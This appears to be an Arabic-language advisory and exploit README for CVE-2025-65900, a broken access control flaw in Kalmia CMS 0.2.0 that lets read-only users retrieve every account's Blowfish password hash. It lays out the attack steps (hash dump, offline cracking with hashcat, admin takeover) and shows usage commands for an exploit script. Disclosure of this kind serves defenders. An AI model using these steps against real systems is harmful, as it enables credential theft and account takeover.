
DifuseHQ Kalmia CMS الإصدار 0.2.0 يحتوي على ثغرة في التحكم غير الصحيح بالوصول في نقطة نهاية API `/kal-api/auth/users`. بسبب عدم كفاية التحقق من الصلاحيات والتعرض المفرط للبيانات في النهاية الخلفية، يمكن لمستخدم موثَّق بصلاحيات قراءة أساسية استرجاع معلومات حساسة لجميع مستخدمي المنصة.
معرف CVE: CVE-2025-65900
المنتج: DifuseHQ Kalmia CMS
الإصدار المتأثر: 0.2.0
نوع الثغرة: التحكم غير الصحيح في الوصول
الصلاحيات المطلوبة: منخفضة (حساب مستخدم للقراءة فقط)
تسمح هذه الثغرة لمستخدم منخفض الصلاحية باسترجاع معلومات حساسة لجميع حسابات المنصة، بما في ذلك تجزئات كلمات المرور Blowfish. يمكن للمهاجمين تنفيذ كسر تجزئات دون اتصال، وتصعيد الصلاحيات، واحتمالية اختراق حسابات إدارية، مما يؤدي إلى السيطرة الكاملة على النظام.
قيد انتظار موافقة المشرف - https://github.com/DifuseHQ/Kalmia/pull/34
يحتوي DifuseHQ Kalmia CMS الإصدار 0.2.0 على ثغرة التحكم غير الصحيح في الوصول في نقطة نهاية API /kal-api/auth/users. بسبب التحقق غير الكافي من الصلاحيات وكشف مفرط للبيانات في الواجهة الخلفية، يمكن لمستخدم موثَّق بصلاحيات قراءة أساسية استرجاع معلومات حساسة لجميع مستخدمي المنصة، بما في ذلك تجزئات كلمات المرور Blowfish. يسمح هذا الخلل بالكشف غير المصرَّح به لبيانات بيانات الاعتماد وتمكين هجمات القوة العمياء دون اتصال، مما قد يؤدي إلى اختراق كامل للحساب. ينشأ المشكلة من فحوصات التفويض غير الصحيحة في middleware/auth.go وبيانات المستخدم غير المفلترة التي تُرجعها web/src/api/Requests.ts.
/kal-api/auth/jwt/create/kal-api/auth/usersيفشل التطبيق في تنقية المعلومات الحساسة بشكل صحيح ومنع الوصول إلى نقاط النهاية الحساسة. يمكن للمستخدمين ذوي الوصول للقراءة فقط الحد الأدنى:
يبدأ المهاجم بحساب مستخدم شرعي للقراءة فقط على نظام Kalmia CMS.
يسجل المهاجم دخوله إلى النظام باستخدام بيانات اعتماد القراءة فقط الخاصة به عبر آلية المصادقة القياسية.
باستخدام أدوات مثل Burp Suite، يستشير المهاجم مسار API /kal-api/auth/users ويعرض معلومات الوصول لجميع المستخدمين.
ثم تتم معالجة تجزئات كلمات المرور المستخرجة باستخدام أدوات كسر كلمات المرور مثل hashcat لاستعادة كلمات المرور النصية.
توفر كلمات المرور المكسورة بنجاح وصولًا كاملًا إلى حسابات المستخدمين، بما في ذلك الحسابات الإدارية المحتملة.
يقوم السكريبت cve-2025-65900.py بأتمتة عملية الاستغلال:
python cve-2025-65900.py <TARGET_URL> -u <READ_ONLY_USERNAME> -p <READ_ONLY_PASSWORD>
url: عنوان قاعدة Kalmia CMS المستهدف (مطلوب)-u, --user: اسم المستخدم للقراءة فقط (مطلوب)-p, --password: كلمة المرور للقراءة فقط (مطلوب)-t, --token-endpoint: نقطة نهاية رمز JWT (الافتراضي: /kal-api/auth/jwt/create)-d, --dump: نقطة نهاية تفريغ المستخدمين (الافتراضي: /kal-api/auth/users)-a, --auth: تخطي توليد الرمز واستخدام رمز JWT المقدم-o, --output: حفظ التجزئات المستخرجة إلى ملف# exploitation الأساسي
python cve-2025-65900.py http://target.com:2727 -u readonly_user -p readonly_pass
# حفظ التجزئات إلى ملف
python cve-2025-65900.py http://target.com:2727 -u readonly_user -p readonly_pass -o hashes.txt
# استخدام رمز JWT موجود
python cve-2025-65900.py http://target.com:2727 -u readonly_user -p readonly_pass -a "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."
إخلاء المسؤولية: تُقدَّم هذه المعلومات لأغراض تعليمية ودفاعية فقط. المستخدمون مسؤولون عن ضمان حصولهم على التفويض المناسب قبل اختبار أي أنظمة.